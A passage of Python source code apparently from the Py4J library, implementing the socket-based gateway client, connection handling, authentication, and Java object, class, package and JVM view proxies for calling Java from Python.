def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
responsible for closing the connection (or returning it this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
# Sent shut down before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
# Happens when a the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
self._jvm_id = proto.DEFAULT_JVM_ID
self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name == "__call__":
raise Py4JError("Trying to call a package.")
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
* The `java_process` field of a `JavaGateway` instance is a
subprocess.Popen object for the Java process that the `JavaGateway`
is connected to, or None if the `JavaGateway` connected to a preexisting
Java process (in which case we cannot directly access that process from
Python).
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None,
java_process=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won"t be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
:param java_process: the subprocess.Popen object for the Java process
that the `JavaGateway` shall connect to, if available.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = self._create_gateway_client()
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = self._create_gateway_property()
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
self.java_process = java_process
def _create_gateway_client(self):
gateway_client = GatewayClient(
gateway_parameters=self.gateway_parameters)
return gateway_client
def _create_gateway_property(self):
gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool(),
self.gateway_parameters.enable_memory_management)
if self.python_server_entry_point:
gateway_property.pool.put(
self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False, cwd=None):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem for some
scenarios though.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:param cwd: If not None, path that will be used as the current working
directory of the Java process.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth, cwd=cwd, return_proc=True)
if enable_auth:
_port, _auth_token, proc = _ret
else:
_port, proc, _auth_token = _ret + (None, )
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token),
java_process=proc)
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
